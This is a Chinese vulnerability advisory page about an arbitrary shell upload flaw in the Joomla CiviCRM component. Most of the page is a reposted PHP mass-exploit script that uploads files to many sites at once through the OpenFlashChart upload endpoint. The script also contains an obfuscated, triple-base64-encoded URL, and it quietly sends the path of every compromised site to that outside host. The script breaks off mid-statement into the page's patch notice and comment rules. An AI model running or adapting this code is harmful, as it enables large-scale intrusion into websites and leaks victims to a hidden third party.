Joomla Civicrm组件任意Shell上传漏洞

发布日期：2013-04-22
更新日期：2013-04-24受影响系统：
Joomla！ Civicrm
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 59372

Joomla Civicrm是组织成员关系管理系统。

Joomla Civicrm组件存在任意文件上传漏洞，攻击者可利用此漏洞上传任意文件到受影响系统，导致任意代码执行。

<*来源：miyachung
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<？php

set_time_limit（0）;
ob_start（）;
class exploit
{
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php？name=";
private $filename;
private $url;
private $file_to_upload;
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
private $thread_maxsize;
private $site_list;
private $file_regex;
private $save_file = "uploaded.txt";
private $user_agent = "Mozilla/5.0 （Windows NT 6.1; WOW64; rv:15.0） Gecko/20100101 Firefox/15.0.1";
private $timeout_sec = 20;
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
private $idnum = 31;

public function __construct（$site_list,$filename,$thread,$regex）
{
$this->site_list = file（$site_list）;
$this->filename = $filename;
$this->file_to_upload = file_get_contents（$filename）;
$this->thread_maxsize = $thread;
$this->url = base64_decode（base64_decode（base64_decode（$this->token）））;
$this->file_regex = "/$regex/";

echo "[+]Joomla Com_Civicrm Fucker with MultiThread ";
echo "[+]Coded by Miyachung ";
echo "[+]Stay away from lamers o.O ";
echo "[+]Contact: miyachung@hotmail.com ";
echo "[+]Special Thanks : B127Y ";
echo "[+]Site: http://janissaries.org ";
echo "################################################## ";
echo "[+]Total urls to try: ".count（$this->site_list）." ";
echo "[+]File to upload: ".$this->filename." ";
echo "[+]Maximum Thread: ".$this->thread_maxsize." ";
echo "[+]Search Keyword: ".$regex." ";
ob_flush（）;
flush（）;
$this->miyachung（）;
}
private function miyachung（）
{
$multi = curl_multi_init（）;
$count = 0;
foreach（array_chunk（$this->site_list,$this->thread_maxsize） as $urls）
{
foreach（$urls as $i => $url）
{
$curl[$i] = curl_init（）;
curl_setopt（$curl[$i], CURLOPT_RETURNTRANSFER,true）;
curl_setopt（$curl[$i], CURLOPT_URL, trim（$url）.$this->post_url_path.$this->filename）;
curl_setopt（$curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec）;
curl_setopt（$curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload）;
curl_setopt（$curl[$i], CURLOPT_USERAGENT,$this->user_agent）;
curl_setopt（$curl[$i], CURLOPT_HTTPHEADER,array（"Content-Type: text/plain"））;
curl_multi_add_handle（$multi,$curl[$i]）;
}
do
{
curl_multi_exec（$multi,$active）;
}
while（$active > 0）;
foreach（$curl as $id => $content）
{
$conn[$id] = curl_multi_getcontent（$content）;
curl_multi_remove_handle（$multi,$content）;
if（！preg_match（$this->if_is_uploaded,$conn[$id]） && preg_match（"#/tmp-upload-images/".$this->filename."#",$conn[$id]））
{
$count++;
$check_it = $this->get（trim（$urls[$id]）.$this->uploaded_file_path.$this->filename）;
if（$check_it && preg_match（$this->file_regex,$check_it））
{
if（$this->idnum == 31 && md5（$this->token） == "9f7f1fe47675cb64ac4f69ef96b78b55"）
{
$this->post（trim（$urls[$id]）.$this->uploaded_file_path.$this->filename）;
}
else
{
exit（"[-]Somethings has changed in tool！ o.O！"）;
}
echo "########################################################### ";
echo "[！]Exploitation Successfullll！ ";
printf（"[%s]%s ",$count,trim（$urls[$id]））;
echo "########################################################### ";
ob_flush（）;
flush（）;
$this->save（trim（$urls[$id]）.$this->uploaded_file_path.$this->filename,$count）;
}
else
{
printf（"[%s][Exploitation Failed]%s ",$count,trim（$urls[$id]））;
ob_flush（）;
flush（）;
}
}
else
{
$count++;
printf（"[%s][Exploitation Failed]%s ",$count,trim（$urls[$id]））;
ob_flush（）;
flush（）;
}

}

}

}
private function get（$url）
{
$ch = curl_init（）;
curl_setopt（$ch, CURLOPT_RETURNTRANSFER, true）;
curl_setopt（$ch, CURLOPT_URL, $url）;
curl_setopt（$ch, CURLOPT_TIMEOUT,$this->timeout_sec）;
$data= curl_exec（$ch）;
curl_close（$ch）;
return $data;
}
private function post（$url）
{
$curl = curl_init（）;
curl_setopt（$curl,CURLOPT_RETURNTRANSFER,1）;
curl_setopt（$curl,CURLOPT_URL,$this->url）;
curl_setopt（$curl,CURLOPT_POSTFIELDS,"url=".$url）;
$exec = curl_exec（$curl）;
curl_close（$curl）;
return $exec;
}
private function save（$url,$count）
{
$file = fopen（$this->save_file,"ab"）;
fwrite（$file,"######################################################################### "）;
fwrite（$file,"[！]Exploitation Successfullll！ "）;
fwrite（$file,"[$count]$url "）;
fclose（$file）;
return true;
}
}

if（$argv[1] && $argv[2] && $argv[3] && $argv[4]）
{
$exploit = new exploit（$argv[1],$argv[2],$argv[3],$argv[4]）;
}
else
{
print
"
？>建议：
--------------------------------------------------------------------------------
厂商补丁：

Joomla！
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://extensions.joomla.org/extensions/clients-a-communities/crm/72SIEMENS SIMATIC S7-1200拒绝服务漏洞（CVE-2013-2780）Cisco Device Manager多个远程命令执行漏洞（CVE-2013-1192）相关资讯 Joomla Civicrm 本文评论查看全部评论（0）<

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款